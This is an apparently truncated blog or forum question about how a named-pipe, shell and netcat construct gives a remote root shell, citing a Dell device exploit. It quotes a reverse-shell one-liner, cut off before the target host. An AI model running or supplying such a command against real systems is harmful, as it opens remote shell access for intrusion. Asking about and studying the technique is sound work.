Can pipe | shell | nc > pipe achieve remote shell?
In one of the articles I have came across an exploit of Dell devices that said when you trigger the following line of code (executed somewhere in php) you will get a remote root shell :
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc … Continue reading Can pipe | shell | nc > pipe achieve remote shell?